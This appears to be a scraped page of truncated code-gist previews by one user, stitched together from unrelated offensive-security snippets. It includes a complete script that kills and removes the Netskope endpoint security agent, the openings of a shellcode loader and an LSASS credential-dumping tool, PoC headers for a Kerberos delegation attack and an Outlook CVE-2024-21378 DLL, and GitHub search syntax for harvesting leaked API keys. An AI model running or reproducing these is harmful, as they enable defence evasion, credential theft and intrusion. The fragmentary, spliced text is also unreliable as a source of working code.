yeshuibo

#!/bin/sh

sudo ps aux | grep Netskope | grep -v grep | awk '{ print "kill -9", $2 }' | sudo sh
echo '[✓] Kill Netskope Process'

sudo rm -rf /Applications/Remove\ Netskope\ Client.app
echo '[✓] Removed Remove Netskope Client.app'

sudo rm -rf /Library/Application\ Support/Netskope
echo '[✓] Removed Agent of Netskope Client.app'

yeshuibo

using System;
using System.IO;
using System.Runtime.InteropServices;

namespace UnmanagedCode
{
	class Program
	{
		[DllImport("kernel32")]
		static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode);

yeshuibo

echo 'deb http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sources.list
apt-get update
apt-get -y install php5 libapache2-mod-php5 php5-mysql php5-curl php5-gd php5-intl php5-imap php5-mcrypt  php5-pspell php5-recode php5-tidy php5-xmlrpc php5-xsl
a2dismod php7.0 ; sudo a2enmod php5 ; sudo service apache2 restart
service mysql start

yeshuibo

Pwntools Cheatsheet

1. Program Interaction
2. Environment and Contexts
3. Logging and Output
4. Encoding, Packing and Utility
5. Assembly and Shellcraft
6. ELFs, Strings and Symbols
7. Return Oriented Programming
8. SROP and Sigreturn Frames

yeshuibo

#!/usr/bin/env python

# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a *very* rough PoC

import SimpleHTTPServer
import SocketServer
import base64
import random
import struct

yeshuibo

/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability, 
 *    specifically targeting MS Outlook.
 * 
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and

yeshuibo

Index

• #prepreqs
• #roadmap

---

preprequisites

yeshuibo

#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>

DWORD GetLsassPid() {

	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

yeshuibo

#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>

//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE

yeshuibo

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.